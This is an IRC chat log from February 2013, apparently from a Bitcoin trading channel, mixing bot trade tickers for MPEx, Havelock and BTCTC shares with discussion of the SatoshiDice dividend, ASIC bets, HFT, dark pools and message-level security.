Feb 02 17:24:39 I believe his behavior deserves one, but he doesn't owe me any money Feb 02 17:25:11 mircea_popescu: sent Feb 02 17:27:25 I won't speak for Ukto just I think he'll keep the exchange privately owned atm. me with coinbr likewise. Feb 02 17:27:40 jurov ty Feb 02 17:27:52 jurov the usd/btc exchange is at issue Feb 02 17:27:57 not the securities exchange Feb 02 17:27:59 [MPEX] [S.MPOE] 5939 @ 0.00067714 = 4.0215 BTC [+] Feb 02 17:30:13 [MPEX] [S.MPOE] 6579 @ 0.00067714 = 4.4549 BTC [+] Feb 02 17:30:15 [MPEX] [S.MPOE] 4793 @ 0.00067716 = 3.2456 BTC [+] Feb 02 17:32:00 [MPEX] [S.MPOE] 8650 @ 0.00067395 = 5.8297 BTC [-] Feb 02 17:35:50 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 02 17:37:17 [MPEX] [S.MPOE] 994 @ 0.00067395 = 0.6699 BTC [-] Feb 02 17:37:19 [MPEX] [S.MPOE] 274 @ 0.00067355 = 0.1846 BTC [-] Feb 02 17:37:21 [MPEX] [S.MPOE] 4321 @ 0.00067125 = 2.9005 BTC [-] Feb 02 17:37:26 [MPEX] [S.MPOE] 6211 @ 0.00067124 = 4.1691 BTC [-] Feb 02 17:39:22 [MPEX] [S.MPOE] 2129 @ 0.00067124 = 1.4291 BTC [-] Feb 02 17:39:24 [MPEX] [S.MPOE] 1821 @ 0.00067011 = 1.2203 BTC [-] Feb 02 17:39:33 [MPEX] [S.MPOE] 14500 @ 0.00066657 = 9.6653 BTC [-] Feb 02 17:39:35 [MPEX] [S.MPOE] 3950 @ 0.00066351 = 2.6209 BTC [-] Feb 02 17:39:42 [MPEX] [S.MPOE] 43250 @ 0.00066081 = 28.58 BTC [-] Feb 02 17:41:19 adding into sources long overdue check: Feb 02 17:41:32 if not 'CxBTC' in stat['Holdings']: Feb 02 17:41:55 log.error("No BTC on MPEx, flipping bozo bit") Feb 02 17:41:56 transaction.doom() Feb 02 17:41:58 raise Feb 02 17:42:33 i was trying to use margin! Feb 02 17:43:14 [HAVELOCK] [HIM] 1 @ 13.5 BTC [+] Feb 02 17:44:41 jurov that's an idea. Feb 02 17:49:47 [MPEX] [S.MPOE] 1242 @ 0.000677 = 0.8408 BTC [+] Feb 02 17:52:35 [MPEX] [S.MPOE] 5800 @ 0.00067619 = 3.9219 BTC [-] Feb 02 17:52:37 [MPEX] [S.MPOE] 3079 @ 0.000677 = 2.0845 BTC [+] Feb 02 17:52:37 [MPEX] [S.MPOE] 7033 @ 0.00067716 = 4.7625 BTC [+] Feb 02 17:55:58 [MPEX] [S.DICE] 1733 @ 0.00739 = 12.8069 BTC [+] Feb 02 17:55:59 [MPEX] [S.DICE] 567 @ 0.007395 = 4.193 BTC [+] Feb 02 17:58:27 hi all Feb 02 17:58:57 [MPEX] [S.MPOE] 7620 @ 0.00067716 = 5.16 BTC [+] Feb 02 17:58:59 [MPEX] [S.MPOE] 830 @ 0.00067717 = 0.5621 BTC [+] Feb 02 18:02:24 meh, already happened twice. just with options instead of btc Feb 02 18:03:05 a, back in the early beta days Feb 02 18:03:06 i recall. Feb 02 18:03:10 well ok then! Feb 02 18:26:54 [MPEX] [S.MPOE] 4321 @ 0.00066257 = 2.863 BTC [-] Feb 02 18:26:57 [MPEX] [S.MPOE] 7512 @ 0.00066253 = 4.9769 BTC [-] Feb 02 18:28:43 [MPEX] [O.BTCUSD.P260T] 322 @ 0.49173352 = 158.3382 BTC Feb 02 18:29:14 [HAVELOCK] [SDICE] 4 @ 0.85 = 3.4 BTC [+] Feb 02 18:31:13 [HAVELOCK] [SDICE] 12 @ 0.85 = 10.2 BTC [+] Feb 02 18:32:11 [MPEX] [S.MPOE] 4321 @ 0.00066576 = 2.8767 BTC [+] Feb 02 18:32:19 [MPEX] [S.MPOE] 8290 @ 0.00066599 = 5.5211 BTC [+] Feb 02 18:34:03 [MPEX] [S.MPOE] 4321 @ 0.0006626 = 2.8631 BTC [-] Feb 02 18:34:05 [MPEX] [S.MPOE] 1099 @ 0.00066254 = 0.7281 BTC [-] Feb 02 18:37:25 [MPEX] [S.MPOE] 8901 @ 0.00066254 = 5.8973 BTC [-] Feb 02 18:37:27 [MPEX] [S.MPOE] 12496 @ 0.00066253 = 8.279 BTC [-] Feb 02 18:37:31 [MPEX] [S.MPOE] 12403 @ 0.00066081 = 8.196 BTC [-] Feb 02 18:40:33 [MPEX] [S.MPOE] 2100 @ 0.00066581 = 1.3982 BTC [+] Feb 02 18:45:59 [MPEX] [S.MPOE] 1765 @ 0.00066081 = 1.1663 BTC [-] Feb 02 18:45:59 [MPEX] [S.MPOE] 8235 @ 0.00066 = 5.4351 BTC [-] Feb 02 18:47:29 [MPEX] [S.MPOE] 1765 @ 0.00066 = 1.1649 BTC [-] Feb 02 18:47:31 [MPEX] [S.MPOE] 2435 @ 0.00065961 = 1.6062 BTC [-] Feb 02 18:51:44 god damn Feb 02 18:52:30 [MPEX] [S.MPOE] 10000 @ 0.00065962 = 6.5962 BTC [+] Feb 02 18:52:32 [MPEX] [S.MPOE] 5565 @ 0.00065961 = 3.6707 BTC [-] Feb 02 18:52:33 [MPEX] [S.MPOE] 1385 @ 0.00065961 = 0.9136 BTC [-] Feb 02 18:52:53 I just realized that I paid 33~ btc for one year of this vps back when btc was around 4 bucks Feb 02 18:52:55 smickles, what's wrong? Feb 02 18:53:04 o, yeah Feb 02 18:53:06 that sucks Feb 02 18:53:19 [MPEX] [S.MPOE] 10400 @ 0.00065961 = 6.8599 BTC [-] Feb 02 18:53:40 it's not really a loss is it. Feb 02 18:56:50 [MPEX] [S.MPOE] 2221 @ 0.00066581 = 1.4788 BTC [+] Feb 02 18:56:54 [MPEX] [S.MPOE] 4286 @ 0.00066599 = 2.8544 BTC [+] Feb 02 18:58:12 [MPEX] [S.MPOE] 2024 @ 0.00066599 = 1.348 BTC [+] Feb 02 18:58:14 [MPEX] [S.MPOE] 6200 @ 0.0006763 = 4.1931 BTC [+] Feb 02 18:58:18 [MPEX] [S.MPOE] 9270 @ 0.00067717 = 6.2774 BTC [+] Feb 02 18:58:25 [MPEX] [S.MPOE] 3406 @ 0.0006773 = 2.3069 BTC [+] Feb 02 19:00:41 [MPEX] [S.MPOE] 10000 @ 0.00067729 = 6.7729 BTC [-] Feb 02 19:00:43 [MPEX] [S.MPOE] 4950 @ 0.0006773 = 3.3526 BTC [+] Feb 02 19:03:57 mircea_popescu: yeah, it's more about the disconnected thought of 'what if I had that btc now' Feb 02 19:04:58 especially if you condider what I got for what value i gave up at the time Feb 02 19:05:20 ya but still... at the time btc still was 4 bux Feb 02 19:06:51 heh, i guess there was ambiguity in that last line of mine Feb 02 19:12:40 http://trilema.com/2013/the-greatest-smartphone-app/ Feb 02 19:19:59 [MPEX] [S.MPOE] 6194 @ 0.0006773 = 4.1952 BTC [+] Feb 02 19:20:01 [MPEX] [S.MPOE] 7151 @ 0.00067789 = 4.8476 BTC [+] Feb 02 19:22:47 [MPEX] [S.MPOE] 8500 @ 0.00067259 = 5.717 BTC [-] Feb 02 19:23:09 can i get a hells yeah? Feb 02 19:23:36 ;;ticker Feb 02 19:23:36 BTCUSD ticker | Best bid: 20.01826, Best ask: 20.08896, Bid-ask spread: 0.07070, Last trade: 20.01826, 24 hour volume: 91960.08171071, 24 hour low: 18.00000, 24 hour high: 21.10000, 24 hour vwap: 19.72764 Feb 02 19:24:02 [MPEX] [S.MPOE] 5550 @ 0.00067259 = 3.7329 BTC [-] Feb 02 19:24:04 [MPEX] [S.MPOE] 4321 @ 0.00066001 = 2.8519 BTC [-] Feb 02 19:24:06 [MPEX] [S.MPOE] 3239 @ 0.00066 = 2.1377 BTC [-] Feb 02 19:26:20 [MPEX] [S.MPOE] 4321 @ 0.00067768 = 2.9283 BTC [+] Feb 02 19:26:22 [MPEX] [S.MPOE] 2449 @ 0.00067789 = 1.6602 BTC [+] Feb 02 19:26:29 [MPEX] [S.MPOE] 8730 @ 0.0006779 = 5.9181 BTC [+] Feb 02 19:28:30 [MPEX] [S.MPOE] 4321 @ 0.00066026 = 2.853 BTC [-] Feb 02 19:28:31 [MPEX] [S.MPOE] 6761 @ 0.00066 = 4.4623 BTC [-] Feb 02 19:28:37 [MPEX] [S.MPOE] 5518 @ 0.00065987 = 3.6412 BTC [-] Feb 02 19:28:51 back above 20 Feb 02 19:30:08 on the weekend Feb 02 19:30:18 no fresh cash deposits Feb 02 19:30:25 BULLISH Feb 02 19:30:28 :-P Feb 02 19:33:13 [HAVELOCK] [KCIM] 48 @ 1 = 48 BTC [+] Feb 02 19:35:09 ;;ticker Feb 02 19:35:10 BTCUSD ticker | Best bid: 20.08903, Best ask: 20.18000, Bid-ask spread: 0.09097, Last trade: 20.08903, 24 hour volume: 91978.23757009, 24 hour low: 18.00000, 24 hour high: 21.10000, 24 hour vwap: 19.72608 Feb 02 19:35:14 [BTCTC] [GSDPT] 1 @ 0.0079 BTC [+] Feb 02 19:35:58 [MPEX] [S.MPOE] 20 @ 0.0006779 = 0.0136 BTC [+] Feb 02 19:36:00 [MPEX] [S.MPOE] 3330 @ 0.00068004 = 2.2645 BTC [+] Feb 02 19:37:26 [MPEX] [S.MPOE] 6670 @ 0.00068004 = 4.5359 BTC [+] Feb 02 19:37:28 [MPEX] [S.MPOE] 4321 @ 0.00068005 = 2.9385 BTC [+] Feb 02 19:37:32 [MPEX] [S.MPOE] 5360 @ 0.00068006 = 3.6451 BTC [+] Feb 02 19:39:21 okays, seems the echo is resolved as well. Feb 02 19:39:26 what an eventful day. Feb 02 19:39:48 do bitcoins remind anyone else of kongbucks? Feb 02 19:40:25 maybe we might see burbclaves in my lifetime lol Feb 02 19:41:45 hey all Feb 02 19:41:50 asciilifeform http://www.loper-os.org/?p=1009 re-doing that would be a worthy exercise Feb 02 19:41:59 may 2012 is right before s.dice started to move, among other things Feb 02 19:42:00 SD dividend is about to launch Feb 02 19:42:04 heya! Feb 02 19:43:43 DONE Feb 02 19:44:59 MPEx ‏@MPEx1 Feb 02 19:44:59 S.DICE paid a total dividend of 2`000.73731948 BTC to 10`000`000 outstanding shares. #dividend #bitcoin #btc #stocks Feb 02 19:45:10 kakobrekla assbot gotta do dividends again Feb 02 19:47:54 evoorhees: Congratulation! Amazingly done! Feb 02 19:48:52 Very very nice evoorhees Feb 02 19:49:08 thanks guys Feb 02 19:49:24 so great to see such a success story...and i think the future looks even brighter Feb 02 19:49:39 I think the most exciting thing is that this rediculous numbers will get the attention of established gambling sites, and they will no longer ignore bitcoin Feb 02 19:50:29 yes exactly Feb 02 19:50:31 mircea_popescu: working on it Feb 02 19:50:32 They got my attention a few months back... Feb 02 19:50:42 When they were not even as big. Feb 02 19:51:07 mircea_popescu: but most BTC users will ignore the results, even more firmly than they ignored Shamir's. Feb 02 19:51:27 asciilifeform good, then i can point out why the theory is nonsense on fresh data. Feb 02 19:51:56 and most btc users matter in the sense most los angeles self-styled actresses matter. Feb 02 19:53:10 this is like the matrix...i can only imagine (if the asics turn out to be widespread) just how many petaflops we will reach Feb 02 19:53:33 petaflops is really a measure of floating point computation Feb 02 19:53:35 this is the biggest distributed computing project in human history i imagine Feb 02 19:53:38 sha hashing is integer computation Feb 02 19:53:39 yes Feb 02 19:53:45 the two aren't really all that interchangeable Feb 02 19:53:50 yeah Feb 02 19:53:51 we just do it because we're very lazy Feb 02 19:53:55 terahashes is what matter Feb 02 19:54:12 but it is nice to see how this compares to boinc or seti@home etc Feb 02 19:54:30 nice is one way to put it. from what i've seen in sa's digests, it burns some people Feb 02 19:54:58 how would the cray titan do at hashing? Feb 02 19:55:12 and i don't really care about sa... Feb 02 19:55:25 not very well. Feb 02 19:55:35 rationality says i bet with my money and they bet with theirs...the outcome will be objective Feb 02 19:55:46 what, you're at war or something ? Feb 02 19:55:50 mircea_popescu: care to say why the theory is nonsense? Feb 02 19:56:14 [HAVELOCK] [SDICE] 5 @ 0.875 = 4.375 BTC [+] Feb 02 19:56:27 huh? not at war...but when two people disagree, they bet on the outcome, the winner wins...in pure rational economics...which this isn't Feb 02 19:56:29 not worth it on the old data set. get a fresh one. Feb 02 19:56:39 mjr_ now that's true Feb 02 19:57:11 well, its overly simplified, but yes, if btc hits a thousand or even 40 we objectively chose correctly Feb 02 19:57:16 and they objectively didn't Feb 02 19:57:49 20 is actually good enough already. Feb 02 19:57:53 i agree Feb 02 19:58:05 but i don't think they would be able to be as smug at 40.... Feb 02 19:58:13 i don't see how they could talk about it at all Feb 02 19:58:37 without being extremely mad at themselves for understanding bitcoins, but then choosing to reject Feb 02 19:58:53 that's the sad part is that they know more about it than a lot of users Feb 02 19:58:58 not everyone is profit motivated. Feb 02 19:59:06 in fact, most people who spend a lot of time on forums aren't. Feb 02 19:59:06 good point... Feb 02 19:59:13 also a great point Feb 02 19:59:21 if they were, they'd do real work rather than the sort of boring nonsense that lends itself to foruming Feb 02 19:59:28 but even in matters of debate Feb 02 19:59:31 which they do care about Feb 02 19:59:40 the real world bears out theories or doesn't Feb 02 19:59:53 so their theory will look stupid (moreso than now) Feb 02 20:00:03 and that is something they would care about Feb 02 20:00:17 not really. there's not an objective standard of proof, especially not for people who aren't interested in seeing certain result sets. Feb 02 20:00:30 i guess... Feb 02 20:00:37 [MPEX] [S.MPOE] 11300 @ 0.00067641 = 7.6434 BTC [-] Feb 02 20:00:53 it is very insular, and they probably won't look at any data that disagrees with their preconceived notion Feb 02 20:01:48 what is the command here to look at sdice bid/ask? Feb 02 20:01:48 if you read through it appears obvious what the actual problems they identify with bitcoin are Feb 02 20:01:57 "fygm", for instance, is quite telling. Feb 02 20:02:11 they dislike the fact bitcoin will necessarily bring down the welfare state. Feb 02 20:02:15 yeah, they conflate "people like to scam people" with "bitcoin is an instrument of scamming" Feb 02 20:02:24 this is a valid criticism, it will. as long as they don't want this to happen, bitcoin is and will remain a bad thing. Feb 02 20:02:32 they must not have ever heard of bernie madoff Feb 02 20:02:51 oh, bitcoin will be very bad for some people Feb 02 20:03:05 right. Feb 02 20:03:11 i thought the argument was "will it succeed", the results of it are different for each person Feb 02 20:03:14 so then, those very people will say bitcoin is very bad. no surprise. Feb 02 20:03:26 [BTCTC] [GSDPT] 10 @ 0.0079 = 0.079 BTC [+] Feb 02 20:03:35 i think banks will not like it very much, nor would governments if taken to its logical conclusion... Feb 02 20:03:44 but i don't think that means it won't succeed Feb 02 20:03:54 i would take it seriously, and i would adapt Feb 02 20:04:10 ya well. Feb 02 20:04:18 i think snowcrash is going to be somewhat of a prophecy at this point lol Feb 02 20:04:24 [MPEX] [S.MPOE] 4321 @ 0.00066535 = 2.875 BTC [-] Feb 02 20:04:25 [MPEX] [S.MPOE] 34750 @ 0.00066524 = 23.1171 BTC [-] Feb 02 20:04:27 [MPEX] [S.MPOE] 129 @ 0.00066411 = 0.0857 BTC [-] Feb 02 20:04:57 !ticker s.dice Feb 02 20:04:58 I don't know those people, and they don't look very friendly. Feb 02 20:05:01 congrats satoshidice Feb 02 20:05:02 that book touches a lot of interesting points, but i think it's tamest assertion is that a country is only as strong as it's monetary supply Feb 02 20:05:04 !ticker m s.dice Feb 02 20:05:06 [MPEX:S.DICE] 1D: 0.007148 / 0.00737178 / 0.007395 (143373 shares, 1,056.91 BTC), 7D: 0.00534524 / 0.00731861 / 0.00749999 (574974 shares, 4,208.01 BTC), 30D: 0.00085848 / 0.00487004 / 0.0075 (6619114 shares, 32,235.38 BTC) Feb 02 20:05:14 im fascinated at the relative lack of movement. Feb 02 20:05:22 wish i had bitcoins now Feb 02 20:05:23 apparently nobody was holding for div time Feb 02 20:05:28 how comes i unexpectedly received something and the address points to http://bitbet.us/bet/131/btc-will-have-a-new-highest-price-in/ ? Feb 02 20:05:34 that bet isn't closed Feb 02 20:05:41 4 days i will be ready to invest Feb 02 20:05:50 jurov did you use same addy for other bets? Feb 02 20:06:16 maybe, i don't remember, but only this one was found. Feb 02 20:06:45 same lack of movement last div too Feb 02 20:07:02 Bugpowder very institutional-like investors i guess Feb 02 20:07:37 buy and hold is usually the best strategy Feb 02 20:07:54 (assuming you invest in companies you believe in) Feb 02 20:07:58 this is true. Feb 02 20:08:19 has anyone read antifragile? Feb 02 20:08:48 i'm not finished with it, but i think so far that it is very interesting when looked at through the eyes of a bitcoiner Feb 02 20:09:30 and i would be extremely interested to know what Taleb Nassim thinks about btc Feb 02 20:10:38 hey, ask him. i'd be interested too. Feb 02 20:11:06 in fact, i wonder if universa capital (his investment fund) would be interested lol Feb 02 20:11:23 give them a call. Feb 02 20:12:12 http://www.universa.net/ just read the front page...i think i might have better luck with email...though i am pretty sure i'll get filtered out quickly Feb 02 20:13:36 [MPEX] [S.MPOE] 4321 @ 0.00066682 = 2.8813 BTC [+] Feb 02 20:13:43 [MPEX] [S.MPOE] 5179 @ 0.00066696 = 3.4542 BTC [+] Feb 02 20:15:49 [MPEX] [S.MPOE] 3339 @ 0.00066696 = 2.227 BTC [+] Feb 02 20:16:39 i did not notice the "Open" choice is by default on bitbet search Feb 02 20:16:59 yup, made 1BTC on asic non-delivery bet Feb 02 20:17:07 wd. Feb 02 20:17:14 was a tough one to close that. Feb 02 20:17:58 https://bitcointalk.org/index.php?topic=77469.msg1498765#msg1498765 this is sorta funny. Feb 02 20:18:06 Diablo-D3 who told you to get involved with avalon baby. Feb 02 20:20:23 reminder for people who want to bet on/against asics and don't have mpex account: https://bitfunder.com/asset/CoinBr.iDiff-E Feb 02 20:22:55 [MPEX] [S.DICE] 1200 @ 0.00739499 = 8.874 BTC [-] Feb 02 20:22:59 why are people doubting delivery? i'm just curious, i thought the first ones already were delived... Feb 02 20:23:02 evoorhees do you suppose something like a 100% win address for sdice would be a good idea ? Feb 02 20:23:17 mjr_ they sent two prototype units. Feb 02 20:23:22 ah ok Feb 02 20:23:38 so they may not have ramped up production as much as previously thought Feb 02 20:23:38 [MPEX] [S.MPOE] 6711 @ 0.00067226 = 4.5115 BTC [+] Feb 02 20:23:43 [MPEX] [S.MPOE] 689 @ 0.00066438 = 0.4578 BTC [-] Feb 02 20:24:16 o hey, apparently ineedausername resurfaced, and is paying his gippt thing in full. Feb 02 20:27:25 mircea... that's kinda interesting Feb 02 20:27:29 you mean for promotion or what? Feb 02 20:28:16 no. for mixing. Feb 02 20:28:36 how would that help SD? Feb 02 20:28:37 you send X btc, you receive 9x% of x back 100% of time Feb 02 20:28:42 you take your rake. Feb 02 20:29:34 possibly make it so that inputs sent to that addy are NEVER 0conf'd and as a result they never receive back anything based on the same inputs. Feb 02 20:30:17 you've got by far the best mixer out there, might as well use it as such Feb 02 20:30:25 (course people can do it already by just playing) Feb 02 20:30:54 not sure I'd want to advocate it as a mixer Feb 02 20:31:01 just a thought. Feb 02 20:31:05 it's a good though Feb 02 20:31:08 thought* Feb 02 20:37:53 [MPEX] [S.MPOE] 2200 @ 0.00067641 = 1.4881 BTC [+] Feb 02 20:38:03 [MPEX] [S.MPOE] 1840 @ 0.00068006 = 1.2513 BTC [+] Feb 02 20:38:04 [MPEX] [S.MPOE] 7650 @ 0.0006803 = 5.2043 BTC [+] Feb 02 20:38:06 [MPEX] [S.MPOE] 2700 @ 0.00068032 = 1.8369 BTC [+] Feb 02 20:38:06 [MPEX] [S.MPOE] 2560 @ 0.00068038 = 1.7418 BTC [+] Feb 02 20:41:15 [HAVELOCK] [SDICE] 7 @ 0.875 = 6.125 BTC [+] Feb 02 20:44:15 [HAVELOCK] [SDICE] 3 @ 0.88 = 2.64 BTC [+] Feb 02 20:45:47 dude srlsy ? Feb 02 20:50:57 somebody just got robbed Feb 02 20:53:54 [MPEX] [S.MPOE] 3632 @ 0.00066438 = 2.413 BTC [-] Feb 02 20:53:56 [MPEX] [S.MPOE] 4468 @ 0.00066412 = 2.9673 BTC [-] Feb 02 20:57:39 Our many and talented graphical artists are hard at work refining the abyssal beauty that is MPEx.co, and I dare not interrupt them. Feb 02 20:57:47 ^^mircea, do you use gremlins? Feb 02 20:59:24 *use/employ Feb 02 21:10:07 pixies Feb 02 21:12:35 [MPEX] [S.DICE] 1209 @ 0.00737449 = 8.9158 BTC [-] Feb 02 21:13:18 now am really curious what will reddit say to it all: http://www.reddit.com/r/Bitcoin/comments/17rjzk/mpex_this_is_what_we_mean_by_bitcoin_will/ Feb 02 21:13:44 [MPEX] [S.DICE] 10000 @ 0.007395 = 73.95 BTC [+] Feb 02 21:14:19 reddit is truly full of morons Feb 02 21:15:05 noo !? Feb 02 21:15:17 perhaps. but someone might get the point. Feb 02 21:17:13 [HAVELOCK] [SDICE] 40 @ 0.79 = 31.6 BTC [-] Feb 02 21:17:15 [HAVELOCK] [SDICE] 15 @ 0.79 = 11.85 BTC [-] Feb 02 21:17:16 [HAVELOCK] [SDICE] 20 @ 0.79 = 15.8 BTC [-] Feb 02 21:17:17 [HAVELOCK] [SDICE] 4 @ 0.79 = 3.16 BTC [-] Feb 02 21:17:18 [HAVELOCK] [SDICE] 13 @ 0.79 = 10.27 BTC [-] Feb 02 21:18:42 [MPEX] [S.MPOE] 5532 @ 0.00066412 = 3.6739 BTC [-] Feb 02 21:18:45 [MPEX] [S.MPOE] 2868 @ 0.00066411 = 1.9047 BTC [-] Feb 02 21:18:53 http://organofcorti.blogspot.com/2013/02/98-asic-choices-avalon-update.html Feb 02 21:22:48 http://trilema.com/2013/mpex-tech-stuff/#footnote_0_45984 makes the fee i paid worth it :) Feb 02 21:23:14 [HAVELOCK] [SDICE] 5 @ 0.79 = 3.95 BTC [-] Feb 02 21:25:26 sorry noob question here... Feb 02 21:25:38 why are havelock shares of SDICE 0.79? Feb 02 21:25:42 are they sold in batches of 100? Feb 02 21:25:48 yes they are Feb 02 21:25:56 question answered, thanks :) Feb 02 21:27:08 course i guess topace hasn't been on in a little Feb 02 21:27:14 [HAVELOCK] [SDICE] 1 @ 0.79 BTC [-] Feb 02 21:27:15 and he's run out of shares driving the price up Feb 02 21:28:34 [BTCTC] [GSDPT] 1 @ 0.0079 BTC [+] Feb 02 21:28:59 ironically, most actively maintained/arbitraged passthrough is the litecoin one, run by deprived Feb 02 21:29:37 through coinbr :D Feb 02 21:30:45 he moves stuff almost every day Feb 02 21:33:21 deprived is really very competent/active Feb 02 21:33:31 not sure why he sits put in ltcs. Feb 02 21:34:45 really nice article on reddit mircea_popescu Feb 02 21:34:52 a ty Feb 02 21:34:57 so upvote Feb 02 21:35:04 no account Feb 02 21:35:08 but i can change that Feb 02 21:35:11 hold on Feb 02 21:36:08 *snatches the article away* Feb 02 21:37:09 upvoted Feb 02 21:37:25 specifically about database locking Feb 02 21:37:38 i'm not sure i understood how you were fixing that issue Feb 02 21:38:14 [HAVELOCK] [SDICE] 2 @ 0.79 = 1.58 BTC [-] Feb 02 21:38:37 the how wasn't actually explained. Feb 02 21:38:49 ah ok Feb 02 21:39:16 that makes sense then that i didn't understand it...i have to deal with databases a lot and they can be a pain Feb 02 21:39:26 specifically because of locking issues... Feb 02 21:39:46 also, how would dedicated circuits play into what you were talking about re: phishing Feb 02 21:40:08 i mean, the endpoints are fixed, and don't most banks rely on them, in colocations and carrier hotels? Feb 02 21:40:40 dedicated circuits??? Feb 02 21:40:42 we get our market data through instinet and sfti...but it is not really over the internet Feb 02 21:40:53 everything goes through a physical point to point connection Feb 02 21:41:33 dedicated circuit...maybe metro ethernet in some cases Feb 02 21:41:50 but typically it is a /29 subnet mask...only 2 addresses anyway Feb 02 21:41:59 i don't think mpex will be able to afford laying fiber even to biggest customers in near future Feb 02 21:42:05 lol Feb 02 21:42:12 not have to lay fiber Feb 02 21:42:29 host in a data center where you can cross connect to other people Feb 02 21:43:07 but that's tailored to HFT. and MP is quite anti-HFT. Feb 02 21:43:09 just curious, because most big markets and banks do that...so i don't know how phishing can interfere in those cases, obviously customer on online banking website is vulnerable Feb 02 21:43:33 kinda...i think it is mostly for reliabilty and just plain access Feb 02 21:44:02 for example, if you want arca market data...you have to get it from somewhere and typically you do that through a circuit Feb 02 21:44:10 mjr_ a dedicated circuit is vulnerable to splicing Feb 02 21:44:15 yes true Feb 02 21:44:17 in principle, there's two ways to handle things : Feb 02 21:44:25 but not with the same ease as phishing typically Feb 02 21:44:29 either secure the conduit, message agnostic, or secure the message, conduit agnostic. Feb 02 21:44:38 everyone is currently doing the former. i am doing the later Feb 02 21:44:44 and i say it's the Right Thing. Feb 02 21:44:46 well when put that way, conduit agnostic is very much prefferd Feb 02 21:44:52 indeed. Feb 02 21:45:15 https is securing the conduit, ignoring the message. so is dedicated circuit. so is everything done currently pretty much Feb 02 21:45:18 no wonder it doesn't work. Feb 02 21:45:22 yes Feb 02 21:45:39 now, fiber is slightly bettert as a secure conduit, esp if you have quantum verifiers Feb 02 21:45:42 do you think you could build encryption into the nic card and switch/router? Feb 02 21:45:45 (which are epensive tho) Feb 02 21:45:50 but in general, you can't secure a cable. Feb 02 21:45:52 LOL yes they certainly are Feb 02 21:46:22 i would expect that encryption stays with the person. Feb 02 21:46:30 see the next article on the blog about something along those lines. Feb 02 21:46:41 yes, i just mean that typically pgp is not the easiest thing for most people Feb 02 21:46:49 i agree completely that encryption is vital Feb 02 21:46:55 and i think you are doing things the Right Way Feb 02 21:47:40 sometimes the Right Way is also the Hard Way, though, and even though it's well worth the value, adoption rate is important, so making the Right Way easier would be nice Feb 02 21:47:53 but that's tailored to HFT. and MP is quite anti-HFT. << im not anti hft. im anti stupidity, which is mostly phantom orders. Feb 02 21:48:03 yes very true Feb 02 21:48:11 i was going to ask about speed of executions... Feb 02 21:48:57 mircea, good clarification. Feb 02 21:49:01 [MPEX] [S.MPOE] 4600 @ 0.00066716 = 3.0689 BTC [+] Feb 02 21:49:05 no argument that this is kinda hard, but not so sure it's for a good reason Feb 02 21:49:06 jurov: and if he was against HFT why would he provide API? it's practically the only use for it, besides building a pretty front end (although maybe you mean a slow bot?) Feb 02 21:49:12 i mean... oral sex seems the HARD THING, Feb 02 21:49:17 esp if you're a 1950s housewife Feb 02 21:49:27 yes changing attitudes is tough Feb 02 21:49:31 but inevitable Feb 02 21:49:47 mjr_ the problem with hfts isn't that they're fast. it's that they retroactively change time. Feb 02 21:49:53 as in... this order "wasn't really there sorry". Feb 02 21:49:54 that's bs. Feb 02 21:50:04 total bs, and i don't know how you would do that Feb 02 21:50:09 if you get the ack back...its real Feb 02 21:50:32 ya well give me an example of a hft getting crossed by retail lol. Feb 02 21:50:36 and most exchanges won't bust that trade for you Feb 02 21:50:38 actually, let me dig out this instructive example Feb 02 21:50:54 http://trilema.com/2012/mpex-and-the-hft-problem/ Feb 02 21:50:57 mostly for the quote Feb 02 21:51:04 my favorite usage of HFT was the guy who used the speed of light to his advantage Feb 02 21:51:22 ie. it would take 11ms for any information from NY to reach Chicago Feb 02 21:51:47 [MPEX] [S.DICE] 738 @ 0.007395 = 5.4575 BTC [+] Feb 02 21:51:53 so he would have a bot place orders at a very specific time, and then in chicago have orders in place to take advantage of the move he just caused Feb 02 21:52:12 he literally knew the future, because he caused it Feb 02 21:52:17 heh. Feb 02 21:52:26 admittedly only 11ms into the future but in HFT that can be enough Feb 02 21:52:59 quantum arbitrage LOL Feb 02 21:54:21 sounds like stuff to write novels with Feb 02 21:54:41 yeah, by the way Feb 02 21:54:48 your implementation of the solution is already in place Feb 02 21:54:54 ie. delayed cancels Feb 02 21:55:10 dark pools can be very specific about how long you have to wait b4 canceling Feb 02 21:55:16 on one that we use, it's 30 seconds Feb 02 21:55:29 they can also limit which symbols you can use, how much volume, everything Feb 02 21:55:46 in exchange for being able to bypass the bots and in fact the whole order book Feb 02 21:55:57 something lik that, yes Feb 02 21:56:02 how much do they charge ? Feb 02 21:56:07 depends... Feb 02 21:56:17 many times it's around $1 per 1,000 Feb 02 21:56:27 with the most expensive being $2.50 Feb 02 21:56:37 or somewhere around there Feb 02 21:56:40 but yeah, i lay no claim to genius on the "not instacancellable" part. ffs it's beyond obvious. Feb 02 21:56:50 mjr_ a, no fixed fee to be included ? Feb 02 21:56:58 many darkpools do charge a seat fee. Feb 02 21:57:11 hmmm....you have to negotiate that with the company, and that is usually on a company level of interaction Feb 02 21:57:19 ie. your company offers you access to these routes Feb 02 21:57:19 yeah, Feb 02 21:57:30 [MPEX] [S.DICE] 1464 @ 0.007395 = 10.8263 BTC [+] Feb 02 21:57:32 that is the specific area where my company shines... Feb 02 21:57:40 at least somewhat Feb 02 21:58:02 prop trading can't really work without access to liquidity pools Feb 02 21:58:10 good fill rates, cheap fees Feb 02 21:58:17 even though i think scalping is almost dead Feb 02 21:58:40 thanks to something known as "toxic order flow" Feb 02 21:58:42 it dies, it comes back Feb 02 21:58:45 it's like a zombie Feb 02 21:58:48 hahaha Feb 02 21:59:12 what also was interesting is that our system is built by romanians Feb 02 21:59:38 so much respect to the education system there in regards to math and science Feb 02 21:59:46 5 points (69% like it) Feb 02 21:59:46 9 up votes 4 down votes Feb 02 21:59:55 i like how that thing is getting upvoted into a frenzy Feb 02 22:00:02 but reddit keeps it at 5 Feb 02 22:00:31 [BTCTC] [RSM] 10 @ 0.0098 = 0.098 BTC [-] Feb 02 22:00:40 yeah Feb 02 22:01:22 ;;help Feb 02 22:01:23 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Feb 02 22:01:41 !facts Feb 02 22:01:58 ok... Feb 02 22:06:50 two questions, are signup fees accounted for in mpoe, and can you transfer your positions from a broker back to mpex Feb 02 22:07:04 yes and yes Feb 02 22:07:22 thanks Feb 02 22:07:27 that is an awesome model Feb 02 22:07:46 mjr_, do you already decided on referral? Feb 02 22:07:48 well, technically, the fee goes to mpex, but it gets paid to s.mpoe shareholders Feb 02 22:07:49 mirceau_popescu: also, I love how you mention NYSE as underdog 